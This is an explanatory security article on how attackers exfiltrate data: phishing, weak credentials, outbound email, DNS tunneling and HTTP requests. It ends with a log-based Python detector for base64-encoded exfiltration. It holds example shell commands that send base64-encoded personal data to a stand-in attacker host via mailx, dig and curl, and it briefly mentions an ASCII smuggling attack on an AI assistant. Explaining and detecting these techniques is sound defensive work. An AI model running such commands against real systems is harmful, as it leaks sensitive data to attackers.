Data Exfiltration

Data exfiltration is when cyber criminals steal data from your organization. Let's look at some of the methods they use.

Social Engineering


Social engineering and phishing remain among the most popular methods for data exfiltration. Cyber criminals prey on human psychology, relying on trust, fear or blackmail to manipulate an employee with access to sensitive data. Hackers can obtain a user's credentials, log in to an application and steal the data through whatever methods the application provides, or simply by taking screenshots. Alternatively, hackers can use spam or spoofed emails to lure users into sending the data out themselves: "We need a copy of the monthly expense report by Friday. Thanks. Jim." That's not Jim.


Security Holes


Sometimes cyber criminals are able to exfiltrate data through holes left wide open by a bug or human error. Weak passwords, unpatched systems or misconfigured systems can all lead to data exfiltration. If you have weak SSH credentials, hackers can simply log in and steal any data they find. If your database has weak credentials, they can just query any data they need.


Outbound Email


Hackers can either phish your employees into sending data out, or email it out themselves if they have already broken into your network. Either way, you should be monitoring your outbound email for suspicious activity. By sending thousands of such messages, hackers can steal a lot of data before being caught.

[hacker@yoursystem~]# echo "John Smith|123-45-6789" | base64
Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=
[hacker@yoursystem~]# echo "Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=" | mailx -s "Testing" hacker@evilserver.com




DNS Tunneling


If hackers are in your systems, they can exfiltrate data using DNS tunneling techniques. Those typically work like this: they find some data, encode it (base64 in the example below), then do a DNS lookup for that encoded value as a subdomain of a zone served by a DNS server they control. Then they just look at their log file and recover the data. By doing thousands of these requests, hackers can steal a lot of data before being caught. DNS sinkholing can prevent this when the attacker's domain is already known; watching for unusually long or high-entropy subdomain labels and for high query volumes to a single domain catches the cases it misses.

[hacker@yoursystem~]# echo "John Smith|123-45-6789" | base64
Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=
[hacker@yoursystem~]# dig Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=.evilserver.com


A recent, more advanced DNS tunneling technique was discovered being used to backdoor Windows systems at a university in Taiwan. While the vulnerability has been patched, it shows how sophisticated hackers have become.

Another recent ASCII smuggling technique in Microsoft 365 Copilot shows that AI platforms are not immune to hacking either.


HTTP/HTTPS Request


If hackers are in your systems, they can exfiltrate data using HTTP/HTTPS requests. Those typically work like this: they find some data, encode it, then make an HTTP/HTTPS request carrying that encoded value to a web server they control. Then they just look at their log file and recover the data. By doing thousands of these requests, hackers can steal a lot of data before being caught.

[hacker@yoursystem~]# echo "John Smith|123-45-6789" | base64
Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=
[hacker@yoursystem~]# curl https://evilserver.com/Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=
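The DNS tunneling and HTTP/HTTPS request sections above both rely on the same trick: a base64 blob dropped into a DNS label or a URL path. The following detector, added here as an illustration and not part of the original article, scores each label or path segment for length, base64 shape and entropy, then alerts on any source that sends several distinct encoded tokens to one domain. The log line format, the IP addresses and the sample records are constructed for the demo; evilserver.com is the article's own placeholder.

```python
import math
import re
from collections import Counter, defaultdict

B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")   # base64-shaped, 16+ chars
LOG_LINE = re.compile(r"^(\S+) (\S+) (dns|http) (\S+)$")  # assumed demo log format

def shannon_entropy(s):
    """Bits per character; encoded data scores well above hostnames or words."""
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values()) if s else 0.0

def looks_encoded(token):
    """A DNS label or URL path segment that is long, base64-shaped and high-entropy."""
    return bool(B64_TOKEN.match(token)) and shannon_entropy(token) >= 4.0

def parent_domain(host):
    """Approximate the attacker's zone by the last two labels (no public-suffix list)."""
    return ".".join(host.rstrip(".").split(".")[-2:])

def flag_line(line):
    """(src_ip, destination domain, token) for each encoded-looking token in a log line."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    _ts, src, kind, target = m.groups()
    if kind == "dns":   # payload rides in the subdomain labels
        host, tokens = target, target.rstrip(".").split(".")[:-2]
    else:               # payload rides in the URL path segments
        host, *tokens = re.sub(r"^https?://", "", target).split("/")
    return [(src, parent_domain(host), t) for t in tokens if looks_encoded(t)]

def find_exfil(lines, min_hits=3):
    """Alert on (src_ip, domain) pairs with at least min_hits distinct encoded tokens.
    The article speaks of thousands of requests; min_hits is low only for the sample."""
    hits = defaultdict(set)
    for line in lines:
        for src, domain, token in flag_line(line):
            hits[(src, domain)].add(token)
    return {key: len(toks) for key, toks in hits.items() if len(toks) >= min_hits}

# Constructed sample: three DNS queries and one HTTPS request carrying base64-encoded
# records under the article's evilserver.com, mixed with ordinary traffic.
SAMPLE_LOG = [
    "2024-05-01T10:00:01 10.0.0.5 dns www.google.com",
    "2024-05-01T10:00:02 10.0.0.5 dns Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=.evilserver.com",
    "2024-05-01T10:00:03 10.0.0.5 dns SmFuZSBEb2V8OTg3LTY1LTQzMjEK.evilserver.com",
    "2024-05-01T10:00:04 10.0.0.5 dns QW5uIExlZXw1NTUtMTEtMjIyMgo=.evilserver.com",
    "2024-05-01T10:00:05 10.0.0.5 http https://www.example.com/reports/monthly.pdf",
    "2024-05-01T10:00:06 10.0.0.5 http https://evilserver.com/Sm9obiBTbWl0aHwxMjMtNDUtNjc4OQo=",
]
```

Running `find_exfil(SAMPLE_LOG)` returns `{("10.0.0.5", "evilserver.com"): 3}`: the benign lookups and the report download never match, while the three distinct encoded records sent over DNS and HTTPS from the same host do.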




Various Other Methods


The examples above are kept simple to demonstrate the concepts. Malware and viruses can perform those tasks programmatically. Using similar methods, hackers can use other channels such as SSH tunneling, ICMP or ARP, or embed data into images, QR code images and more. There was a case where the hacker embedded data into a company's website background image; the cyber criminals then simply visited the website, right-clicked and saved the image, and the data was stolen and disseminated easily. Once a hacker is in your system, there are various means to exfiltrate data without your knowledge. Cybersecurity tools like SIEM, Data Loss Prevention (DLP), lateral movement detection, and monitoring outbound ports and traffic through your next-generation firewall can help stop data exfiltration.